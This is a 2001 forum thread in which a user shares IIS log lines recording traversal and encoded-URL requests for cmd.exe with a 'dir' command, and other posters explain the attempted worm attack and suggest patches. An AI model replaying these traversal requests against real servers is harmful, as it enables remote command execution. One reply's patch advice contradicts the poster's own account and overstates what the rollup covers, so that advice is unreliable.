Strange log entries.. 1

[NightWatcher]

Hi..
I have attached part of my IIS log file, which is a bit strange..
Can anyone help me to understand, what happend.

----------------------------------------
2001-07-22 09:02:20 202.207.144.6 - 000.000.000.000 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:20 202.207.144.6 - 000.000.000.000 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:22 202.207.144.6 - 000.000.000.000 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:22 202.207.144.6 - 000.000.000.000 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:25 202.207.144.6 - 000.000.000.000 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:29 202.207.144.6 - 000.000.000.000 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:29 202.207.144.6 - 000.000.000.000 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:31 202.207.144.6 - 000.000.000.000 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:35 202.207.144.6 - 000.000.000.000 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:40 202.207.144.6 - 000.000.000.000 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:44 202.207.144.6 - 000.000.000.000 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:49 202.207.144.6 - 000.000.000.000 80 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:50 202.207.144.6 - 000.000.000.000 80 GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:55 202.207.144.6 - 000.000.000.000 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 403 -
----------------------------------------

The 000.000.000.000 is where my IP was.
What was it that they were trying to do?
And, did they susceeded?

Thank you.


NightWatcher

 

[JohnYingling]

Someone is trying to get CMD.EXE to execute a command on your web site. Those 404 and 5xx result codes indicate that the CMD.EXE program was not found and/ or they were denied access to the directory they tried to access. There are also "malformed" URL's in there hoping to exploit some vulnerability in "unpatched" systems. I've seen the same thing on my web site but my site is hosted so I have no directory structure that contains WINNT. I don't know much more than that. If they had succeeded, you would know. Get the latest patches rfrom MS if this is your server.

http://WWW.VBCompare.Com

 

[NightWatcher]

Thanks..
Let me tell you something, my system is as unpatched as when it was first installed, a week ago. I choose this policy, coz in my last installation, I appied SP1, SP2, and all the patches, I even downloaded the Patch Warning utility, to apply patches as they become available, and that, or something else screw the whole system up, ASP's stoped working, IIS wouldn't restart, and a whole lot more, so this time I have not patched it at all, and it works fine.. Now, either the hackers didn't knew what they were doing, or, I was lucky, but, still, I'm a bit reluctant in starting paching up again, and ending up with an unusable system.

Comments, suggestions or critics on this will be very much appreciated.

Thank you.


NightWatcher

 

[kwagner]

You might want to run your virus checker or worm scanner (thecleaner.com) It looks familar but I've been seeing so many different postings for viruses my head is spinning.

 

[carmenasher]

I can tell you that what you are seeing is the result of the code blue worm trying to access your system. Since your system has SP2 on it will be safe from the NImda worm. Sp2 included a hot fix call MS00-78 which was to prevent the web transversal vulnerability, which code blue effects. It is in your best interest to apply MS01-044 on a system that is running IIS 5.0. The MS01-044 is a Service Pack Roll-UP for IIS and protects you from all vulnerabilities in IIS. For more details on the code blue attempted infection of your system go to:

http://www.cert.org/advisories/CA-2001-26.html